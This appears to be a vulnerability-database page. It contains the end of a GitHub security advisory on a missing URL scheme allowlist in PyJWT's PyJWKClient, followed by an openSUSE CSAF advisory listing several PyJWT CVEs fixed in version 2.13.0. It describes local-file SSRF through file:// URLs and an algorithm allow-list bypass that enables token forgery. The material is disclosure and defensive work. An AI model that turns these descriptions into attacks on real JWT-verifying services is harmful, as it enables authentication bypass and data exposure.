test_pyjwkclient_caller_can_lock_to_https_only():\n with pytest.raises(PyJWKClientError):\n PyJWKClient(\"http://internal.test/jwks.json\", allowed_schemes=(\"https\",))\n```\n\n### Compatibility\n\n- Default `allowed_schemes=(\"https\", \"http\")` preserves backwards compatibility for the overwhelming majority of callers using HTTP/HTTPS JWKS endpoints\n- Breaking only for callers using non-HTTP schemes intentionally (vanishingly rare)\n- No changes to urllib fetch logic itself \u2014 the fix is a pre-validation gate\n\n## Class precedent\n\nThis is the same class as **CVE-2024-21643** (Apache Jena JKU-trust: attacker-supplied JKU URL fetched without scheme validation). NVD-rated CVSS 7.5.\n\n## Prior art (verified 2026-05-06)\n\nConfirmed via live recon (NVD direct, OSV.dev, PyJWT GitHub Security Advisories, issue/PR keyword search, CHANGELOG inspection):\n\n- No existing CVE on PyJWT specifically for PyJWKClient URL scheme handling\n- No existing GitHub issue or PR addressing scheme allowlisting\n- No silent fix in CHANGELOG through 2.12.1\n- 5 prior PyJWT advisories (CVE-2017-11424, CVE-2022-29217, CVE-2024-53861, CVE-2025-45768, CVE-2026-32597) \u2014 none cover this class\n\n## Credit\n\nReported by Keijo Tuominen \u2014 independent security research at CMHT.tech (https://cmht.tech).\n\nReproduction artifacts available on request: full multi-language probe pack (5 wrappers \u00d7 25 fixtures \u00d7 125 cells) demonstrating cross-library divergence at the URL-scheme boundary.",
"id": "GHSA-993g-76c3-p5m4",
"modified": "2026-06-15T19:28:41Z",
"published": "2026-06-15T19:28:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48522"
},
{
"type": "PACKAGE",
"url": "https://github.com/jpadilla/pyjwt"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyjwt/PYSEC-2026-175.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "PyJWKClient: missing scheme allowlist enables CVE-2024-21643-class SSRF + token forgery via file://, ftp://, data: schemes"
}
OPENSUSE-SU-2026:11024-1
Vulnerability from csaf_opensuse - Published: 2026-06-13 00:00 - Updated: 2026-06-13 00:00Summary
python311-PyJWT-2.13.0-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: python311-PyJWT-2.13.0-1.1 on GA media
Description of the patch: These are all security issues fixed in the python311-PyJWT-2.13.0-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-11024
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
4.8 (Medium)
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
5.4 (Medium)
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
low
7.5 (High)
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.4 (High)
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
17 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "python311-PyJWT-2.13.0-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the python311-PyJWT-2.13.0-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-11024",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_11024-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48522 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48522/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48523 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48523/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48524 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48524/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48525 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48525/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48526 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48526/"
}
],
"title": "python311-PyJWT-2.13.0-1.1 on GA media",
"tracking": {
"current_release_date": "2026-06-13T00:00:00Z",
"generator": {
"date": "2026-06-13T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:11024-1",
"initial_release_date": "2026-06-13T00:00:00Z",
"revision_history": [
{
"date": "2026-06-13T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-PyJWT-2.13.0-1.1.aarch64",
"product": {
"name": "python311-PyJWT-2.13.0-1.1.aarch64",
"product_id": "python311-PyJWT-2.13.0-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-PyJWT-2.13.0-1.1.aarch64",
"product": {
"name": "python313-PyJWT-2.13.0-1.1.aarch64",
"product_id": "python313-PyJWT-2.13.0-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python314-PyJWT-2.13.0-1.1.aarch64",
"product": {
"name": "python314-PyJWT-2.13.0-1.1.aarch64",
"product_id": "python314-PyJWT-2.13.0-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-PyJWT-2.13.0-1.1.ppc64le",
"product": {
"name": "python311-PyJWT-2.13.0-1.1.ppc64le",
"product_id": "python311-PyJWT-2.13.0-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-PyJWT-2.13.0-1.1.ppc64le",
"product": {
"name": "python313-PyJWT-2.13.0-1.1.ppc64le",
"product_id": "python313-PyJWT-2.13.0-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python314-PyJWT-2.13.0-1.1.ppc64le",
"product": {
"name": "python314-PyJWT-2.13.0-1.1.ppc64le",
"product_id": "python314-PyJWT-2.13.0-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-PyJWT-2.13.0-1.1.s390x",
"product": {
"name": "python311-PyJWT-2.13.0-1.1.s390x",
"product_id": "python311-PyJWT-2.13.0-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-PyJWT-2.13.0-1.1.s390x",
"product": {
"name": "python313-PyJWT-2.13.0-1.1.s390x",
"product_id": "python313-PyJWT-2.13.0-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python314-PyJWT-2.13.0-1.1.s390x",
"product": {
"name": "python314-PyJWT-2.13.0-1.1.s390x",
"product_id": "python314-PyJWT-2.13.0-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-PyJWT-2.13.0-1.1.x86_64",
"product": {
"name": "python311-PyJWT-2.13.0-1.1.x86_64",
"product_id": "python311-PyJWT-2.13.0-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-PyJWT-2.13.0-1.1.x86_64",
"product": {
"name": "python313-PyJWT-2.13.0-1.1.x86_64",
"product_id": "python313-PyJWT-2.13.0-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python314-PyJWT-2.13.0-1.1.x86_64",
"product": {
"name": "python314-PyJWT-2.13.0-1.1.x86_64",
"product_id": "python314-PyJWT-2.13.0-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-PyJWT-2.13.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64"
},
"product_reference": "python311-PyJWT-2.13.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-PyJWT-2.13.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le"
},
"product_reference": "python311-PyJWT-2.13.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-PyJWT-2.13.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x"
},
"product_reference": "python311-PyJWT-2.13.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-PyJWT-2.13.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64"
},
"product_reference": "python311-PyJWT-2.13.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-PyJWT-2.13.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64"
},
"product_reference": "python313-PyJWT-2.13.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-PyJWT-2.13.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le"
},
"product_reference": "python313-PyJWT-2.13.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-PyJWT-2.13.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x"
},
"product_reference": "python313-PyJWT-2.13.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-PyJWT-2.13.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64"
},
"product_reference": "python313-PyJWT-2.13.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-PyJWT-2.13.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64"
},
"product_reference": "python314-PyJWT-2.13.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-PyJWT-2.13.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le"
},
"product_reference": "python314-PyJWT-2.13.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-PyJWT-2.13.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x"
},
"product_reference": "python314-PyJWT-2.13.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-PyJWT-2.13.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
},
"product_reference": "python314-PyJWT-2.13.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-48522",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48522"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib\u0027s default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application\u0027s jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \"plant a JWKS to forge tokens\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48522",
"url": "https://www.suse.com/security/cve/CVE-2026-48522"
},
{
"category": "external",
"summary": "SUSE Bug 1266798 for CVE-2026-48522",
"url": "https://bugzilla.suse.com/1266798"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-48522"
},
{
"cve": "CVE-2026-48523",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48523"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. From 2.9.0 to 2.12.1, there is a verifier-side algorithm allow-list bypass when jwt.decode() or jwt.decode_complete() are called with a PyJWK key. The token header alg is checked against the caller-supplied algorithms allow-list, but signature verification is performed with the algorithm bound to the PyJWK object instead of the header algorithm. An attacker who controls a registered JWK/JWKS private key can sign with a disallowed algorithm, advertise an allowed algorithm in the JWT header, and still be accepted. The issue affects the documented PyJWKClient.get_signing_key_from_jwt(...) flow. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48523",
"url": "https://www.suse.com/security/cve/CVE-2026-48523"
},
{
"category": "external",
"summary": "SUSE Bug 1266799 for CVE-2026-48523",
"url": "https://bugzilla.suse.com/1266799"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-48523"
},
{
"cve": "CVE-2026-48524",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48524"
}
],
"notes": [
{
"category": "general",
